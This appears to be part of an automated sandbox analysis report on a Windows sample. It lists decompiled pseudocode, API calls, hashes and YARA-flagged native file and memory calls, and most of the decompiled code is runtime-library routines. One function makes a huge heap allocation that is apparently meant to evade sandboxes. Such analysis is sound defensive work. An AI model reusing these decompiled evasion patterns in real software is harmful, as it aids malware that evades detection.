                                                0x00000000
                                                0x00000000
                                                0x0123330f
                                                0x01233315
                                                0x01233326
                                                0x01233326
                                                0x01233326
                                                0x01233328
                                                0x012332f8
                                                0x012332fb
                                                0x01233301
                                                0x01233301
                                                0x01233304
                                                0x01233304
                                                0x0123332b
                                                0x0123332b
                                                0x0123333d
                                                0x0123333d
                                                0x01233340
                                                0x01233343
                                                0x00000000
                                                0x00000000
                                                0x01233345
                                                0x0123334b
                                                0x0123335c
                                                0x0123335c
                                                0x0123335c
                                                0x0123335e
                                                0x01233334
                                                0x01233337
                                                0x01233337
                                                0x0123333a
                                                0x0123333a
                                                0x00000000
                                                0x0123333d
                                                0x00000000
                                                0x00000000
                                                0x01233274
                                                0x00000000
                                                0x00000000
                                                0x012330c4
                                                0x00000000
                                                0x012330bb
                                                0x012335f1
                                                0x012335f6
                                                0x00000000
                                                0x012335f6
                                                0x0123348d

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012334B3
                                                • _wprintf.LIBCMT ref: 01233560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition
                                                • String ID: %d.$%s%s%s%s
                                                • API String ID: 3459578117-4028964860
                                                • Opcode ID: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction ID: 0ce7d7aad8782f8f870fb39d6a6a73441fda7a7f3df5374d2e50e912b325e93b
                                                • Opcode Fuzzy Hash: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction Fuzzy Hash: E3415EB1E1404BAFCF18CB88D5D1ABEBBB6FBD5304F558199D101AB285DA309A45CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E01241673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				signed int _v20;
                                                				void* __edi;
                                                				signed int _t35;
                                                				int _t38;
                                                				intOrPtr* _t44;
                                                				int _t47;
                                                				short* _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t54;
                                                				int _t55;
                                                				void* _t57;
                                                				signed int _t59;
                                                				char* _t62;
                                                
                                                				_t62 = _a8;
                                                				if(_t62 == 0) {
                                                					L5:
                                                					return 0;
                                                				}
                                                				_t50 = _a12;
                                                				if(_t50 == 0) {
                                                					goto L5;
                                                				}
                                                				if( *_t62 != 0) {
                                                					_push(_t57);
                                                					E01237857( &_v20, _t57, _a16);
                                                					_t35 = _v20;
                                                					__eflags =  *(_t35 + 0xa8);
                                                					if( *(_t35 + 0xa8) != 0) {
                                                						_t38 = E0124124B( *_t62 & 0x000000ff,  &_v20);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							__eflags = _a4;
                                                							_t59 = 1;
                                                							_t28 = _v20 + 4; // 0x20432f41
                                                							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                							if(__eflags != 0) {
                                                								L21:
                                                								__eflags = _v8;
                                                								if(_v8 != 0) {
                                                									_t54 = _v12;
                                                									_t31 = _t54 + 0x70;
                                                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                									__eflags =  *_t31;
                                                								}
                                                								return _t59;
                                                							}
                                                							L20:
                                                							_t44 = E01238EFF(__eflags);
                                                							_t59 = _t59 | 0xffffffff;
                                                							__eflags = _t59;
                                                							 *_t44 = 0x2a;
                                                							goto L21;
                                                						}
                                                						_t59 = _v20;
                                                						__eflags =  *(_t59 + 0x74) - 1;
                                                						if( *(_t59 + 0x74) <= 1) {
                                                							L15:
                                                							_t20 = _t59 + 0x74; // 0x3a202020
                                                							__eflags = _t50 -  *_t20;
                                                							L16:
                                                							if(__eflags < 0) {
                                                								goto L20;
                                                							}
                                                							__eflags = _t62[1];
                                                							if(__eflags == 0) {
                                                								goto L20;
                                                							}
                                                							L18:
                                                							_t22 = _t59 + 0x74; // 0x3a202020
                                                							_t59 =  *_t22;
                                                							goto L21;
                                                						}
                                                						_t12 = _t59 + 0x74; // 0x3a202020
                                                						__eflags = _t50 -  *_t12;
                                                						if(__eflags < 0) {
                                                							goto L16;
                                                						}
                                                						__eflags = _a4;
                                                						_t17 = _t59 + 0x74; // 0x3a202020
                                                						_t18 = _t59 + 4; // 0x20432f41
                                                						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                						_t59 = _v20;
                                                						__eflags = _t47;
                                                						if(_t47 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t55 = _a4;
                                                					__eflags = _t55;
                                                					if(_t55 != 0) {
                                                						 *_t55 =  *_t62 & 0x000000ff;
                                                					}
                                                					_t59 = 1;
                                                					goto L21;
                                                				}
                                                				_t49 = _a4;
                                                				if(_t49 != 0) {
                                                					 *_t49 = 0;
                                                				}
                                                				goto L5;
                                                			}



















                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012416A7
                                                • __isleadbyte_l.LIBCMT ref: 012416D5
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241703
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241739
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction ID: ce199ebaf941c399e275516d9836581e1e6676c0bfd5b2e6bcbeabcea774ca07
                                                • Opcode Fuzzy Hash: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction Fuzzy Hash: 8D31A431620217AFDB2EDE78C845B7A7FB5FF41250F194418E66487190D770F4A1DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0123ECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                				intOrPtr _t25;
                                                				void* _t26;
                                                
                                                				_t25 = _a16;
                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                					_t26 = E0123F1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                					goto L9;
                                                				} else {
                                                					_t35 = _t25 - 0x66;
                                                					if(_t25 != 0x66) {
                                                						__eflags = _t25 - 0x61;
                                                						if(_t25 == 0x61) {
                                                							L7:
                                                							_t26 = E0123ED37(_a4, _a8, _a12, _a20, _a24, _a28);
                                                						} else {
                                                							__eflags = _t25 - 0x41;
                                                							if(__eflags == 0) {
                                                								goto L7;
                                                							} else {
                                                								_t26 = E0123F473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                							}
                                                						}
                                                						L9:
                                                						return _t26;
                                                					} else {
                                                						return E0123F3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                					}
                                                				}
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction ID: bc1ba196169972caf36ed79b812752295c6241e0107106cc27b9a04a67d3bfea
                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction Fuzzy Hash: E8014CB246014EFBCF125F88DC45CEE3F26BB99254B5A8815FF1858130D336C9B5AB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0123CC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				LONG* _t20;
                                                				signed int _t25;
                                                				void* _t31;
                                                				LONG* _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                
                                                				_t35 = __eflags;
                                                				_t29 = __edx;
                                                				_t24 = __ebx;
                                                				_push(0xc);
                                                				_push(0x124d9a0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t31 = E0123D59F(__edx, __edi, _t35);
                                                				_t25 =  *0x1251c6c; // 0xfffffffe
                                                				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                					E0123BE5F(0xd);
                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                					_t33 =  *(_t31 + 0x68);
                                                					 *(_t34 - 0x1c) = _t33;
                                                					__eflags = _t33 -  *0x1251524; // 0x1251820
                                                					if(__eflags != 0) {
                                                						__eflags = _t33;
                                                						if(__eflags != 0) {
                                                							__eflags = InterlockedDecrement(_t33);
                                                							if(__eflags == 0) {
                                                								__eflags = _t33 - 0x1251820;
                                                								if(__eflags != 0) {
                                                									E01238F53(_t33);
                                                								}
                                                							}
                                                						}
                                                						_t20 =  *0x1251524; // 0x1251820
                                                						 *(_t31 + 0x68) = _t20;
                                                						_t33 =  *0x1251524; // 0x1251820
                                                						 *(_t34 - 0x1c) = _t33;
                                                						InterlockedIncrement(_t33);
                                                					}
                                                					 *(_t34 - 4) = 0xfffffffe;
                                                					E0123CCAC();
                                                				} else {
                                                					_t33 =  *(_t31 + 0x68);
                                                				}
                                                				_t38 = _t33;
                                                				if(_t33 == 0) {
                                                					E0123751F(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                				}
                                                				return E012391A5(_t33);
                                                			}

                                                APIs
                                                  • Part of subcall function 0123D59F: __getptd_noexit.LIBCMT ref: 0123D5A0
                                                • __lock.LIBCMT ref: 0123CC4D
                                                • InterlockedDecrement.KERNEL32(?), ref: 0123CC6A
                                                • _free.LIBCMT ref: 0123CC7D
                                                • InterlockedIncrement.KERNEL32(01251820), ref: 0123CC95
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 2704283638-0
                                                • Opcode ID: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction ID: 099c9ac3995efe6e602a3e31623a3be9aead9fa77135d7cb14737d78d3cbcf89
                                                • Opcode Fuzzy Hash: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction Fuzzy Hash: 4D01D6B6A20B139BDB3AAF6DB0483AD77A0BFC4710F04440ADA1477280CB349961CFD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E01231B30(intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				char _v45;
                                                				short _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v64;
                                                				intOrPtr _v68;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v92;
                                                				char _v167;
                                                				char _v168;
                                                				signed int _t163;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				void* _t186;
                                                				intOrPtr _t189;
                                                				void* _t292;
                                                				void* _t293;
                                                				void* _t294;
                                                
                                                				_v64 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v45 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v168 = 0;
                                                				_t163 = E012387A0( &_v167, 0, 0x31);
                                                				_t294 = _t293 + 0xc;
                                                				asm("cvttsd2si eax, [ebp+0x8]");
                                                				_v16 = _t163;
                                                				asm("cdq");
                                                				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
                                                				asm("cdq");
                                                				_v16 = _v16 / 0x3e8;
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					asm("cdq");
                                                					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
                                                					asm("cdq");
                                                					_v16 = _v16 / 0x64;
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v36 =  *(_t292 + 0xffffffffffffffa4);
                                                				asm("cdq");
                                                				_v20 = _v36 / 0x64;
                                                				asm("cdq");
                                                				_v12 = _v36 % 0x64;
                                                				asm("cdq");
                                                				_v40 = _v12 / 0xa;
                                                				_t177 = _v12;
                                                				asm("cdq");
                                                				_t178 = _t177 / 0xa;
                                                				_v44 = _t177 % 0xa;
                                                				if(_v12 >= 0x14 || _v20 == 0) {
                                                					if(_v12 >= 0x14 || _v20 != 0) {
                                                						if(_v12 <= 0x14 || _v20 == 0) {
                                                							E01231E50(_t178, _v40,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 8;
                                                						} else {
                                                							E01231E40(_v20, _v20,  &_v32);
                                                							E01238140( &_v64, "Hundred ");
                                                							E01231E50(_v40, _v40,  &_v92);
                                                							E01238140( &_v64,  &_v92);
                                                							E01231E40( &_v32, _v44,  &_v32);
                                                							E01238140( &_v64,  &_v32);
                                                							_t294 = _t294 + 0x18;
                                                						}
                                                					} else {
                                                						E01231E40( &_v32, _v12,  &_v32);
                                                					}
                                                				} else {
                                                					E01231E40(_v20, _v20,  &_v32);
                                                					E01238140( &_v64, "Hundred ");
                                                					E01231E40(_v12, _v12,  &_v32);
                                                					E01238140( &_v64,  &_v32);
                                                					_t294 = _t294 + 0x10;
                                                				}
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
                                                						asm("cdq");
                                                						E01231E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
                                                						asm("cdq");
                                                						E01231E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
                                                						E01238140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
                                                						_t294 = _t294 + 8;
                                                					} else {
                                                						E01231E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
                                                					}
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v8 = 0;
                                                				while(_v8 < 5) {
                                                					_t189 = E012382C0(_t292 + _v8 * 0x1e - 0x13c);
                                                					_t294 = _t294 + 4;
                                                					_v68 = _t189;
                                                					if(_v68 != 0) {
                                                						E01238140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
                                                						E01238140( &_v168,  &_v80);
                                                						_t294 = _t294 + 0x10;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E01238140(_a12,  &_v64);
                                                				_t186 = E012382C0(_a12);
                                                				 *((char*)(_a12 + _t186 - 1)) = 0;
                                                				return _t186;
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memset
                                                • String ID: Hundred $Hundred
                                                • API String ID: 2102423945-1478457770
                                                • Opcode ID: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction ID: bf70320638243ae354252fbc0b49d0d291aebe6d83daf9c5f2d28ace7bd73fee
                                                • Opcode Fuzzy Hash: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction Fuzzy Hash: CBA162F1E10209EFCF08DFE8D881BEDB7B6AF98300F108569E515A7240EB759A15CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0123F71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                				intOrPtr* _v20;
                                                				void* _t4;
                                                				intOrPtr* _t7;
                                                				intOrPtr _t9;
                                                
                                                				_t15 = __edx;
                                                				_t13 = __ebx;
                                                				_t4 = E01243C1F(0, 0x10000, 0x30000);
                                                				if(_t4 != 0) {
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					E01238B87(__ebx, __edx);
                                                					asm("int3");
                                                					_t7 =  *_v20;
                                                					__eflags =  *_t7 - 0xe06d7363;
                                                					if( *_t7 != 0xe06d7363) {
                                                						L9:
                                                						__eflags = 0;
                                                						return 0;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
                                                						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
                                                							goto L9;
                                                						} else {
                                                							_t9 =  *((intOrPtr*)(_t7 + 0x14));
                                                							__eflags = _t9 - 0x19930520;
                                                							if(__eflags == 0) {
                                                								L10:
                                                								E0123C6A9(_t13, _t15, 0, __eflags);
                                                								asm("int3");
                                                								E0123C080(E0123F743);
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								__eflags = _t9 - 0x19930521;
                                                								if(__eflags == 0) {
                                                									goto L10;
                                                								} else {
                                                									__eflags = _t9 - 0x19930522;
                                                									if(__eflags == 0) {
                                                										goto L10;
                                                									} else {
                                                										__eflags = _t9 - 0x1994000;
                                                										if(__eflags == 0) {
                                                											goto L10;
                                                										} else {
                                                											goto L9;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t4;
                                                				}
                                                			}








                                                APIs
                                                • __controlfp_s.LIBCMT ref: 0123F72A
                                                  • Part of subcall function 01243C1F: __control87.LIBCMT ref: 01243C43
                                                • __invoke_watson.LIBCMT ref: 0123F73D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __control87__controlfp_s__invoke_watson
                                                • String ID: csm
                                                • API String ID: 1371525046-1018135373
                                                • Opcode ID: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction ID: cac245fbcc987b2affc1d2901390355be7cad308c80296496929e8e2425ef860
                                                • Opcode Fuzzy Hash: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction Fuzzy Hash: 1DF024F19303071B8B2F996DBB44ABE378D9FE0111FA40512E708CE521DB10C681C0D7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E019DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = L0198CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E019D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E019D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019DFDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019DFE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019DFE01
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 8ba2f84d3f04a299f861fbd99f53972d36e9adfc681113ebc2d578b84c3fbff7
                                                • Instruction ID: 867677f9d7b9c7b8c7bb07907229dc2ba32d865598fab6eceeb680f9494baf74
                                                • Opcode Fuzzy Hash: 8ba2f84d3f04a299f861fbd99f53972d36e9adfc681113ebc2d578b84c3fbff7
                                                • Instruction Fuzzy Hash: 2AF0C232600201BBEA241A45DC02F23BB6AEB84B30F258214F62C561D1DA62F82087B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E01236B80(void* __ecx) {
                                                				void* _v8;
                                                				void* _t5;
                                                				void* _t7;
                                                				void* _t14;
                                                
                                                				_t14 = __ecx;
                                                				_push(__ecx);
                                                				_t5 = HeapAlloc(GetProcessHeap(), 1, 0x17d78400);
                                                				_v8 = _t5;
                                                				_push(_t5);
                                                				if(_t5 != 0x11) {
                                                					asm("cld");
                                                				}
                                                				asm("clc");
                                                				_pop(_t7);
                                                				if(_v8 != 0) {
                                                					E01236C50(_t14, _v8, 0x17d78400);
                                                					_push(_t11);
                                                					asm("cld");
                                                					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
                                                				}
                                                				return _t7;
                                                			}








                                                APIs
                                                • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                • HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                • HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction ID: 9dae238677a1239a02aa92dfad56ca1e7c34d6a8839d004e10bf93faf7fc9f44
                                                • Opcode Fuzzy Hash: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction Fuzzy Hash: B8F0E2B5560618BFE7106AF8BC0DFABB79CE704309F201544F604D3240D5B25A008B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 0036A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: MK6
                                                • API String ID: 2738559852-1530184918
                                                • Opcode ID: 2f198d2c5fe3cab3cdbd9ed426046529e3e86ab704c84d7408bbc02f3ea236ba
                                                • Instruction ID: 71384396ca1d7bd9af02c4dd8c5528e396392e0ab23d7e64caad5f73dc7a1bec
                                                • Opcode Fuzzy Hash: 2f198d2c5fe3cab3cdbd9ed426046529e3e86ab704c84d7408bbc02f3ea236ba
                                                • Instruction Fuzzy Hash: 490129B2200104AFCB14DF98DC95EEB77A9EF8C354F058659BA1DAB241D630E9118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369F7D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 66076dbd17308d0b13fada632bb51caf6c5f76a89df2a804aebec32c10db7623
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 13F0B2B2210208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL( M6,?,?,00364D20,00000000,FFFFFFFF), ref: 0036A085
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: M6
                                                • API String ID: 3535843008-1298217763
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 9df31d787f6e2c4d108096b667b0fd6b7cfa933b88ddf443f99b2c0bb1640411
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: 3BD01776200214ABD710EB98CC85FA77BADEF48760F158599BA18AB242C570FA008AE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 0036A149
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
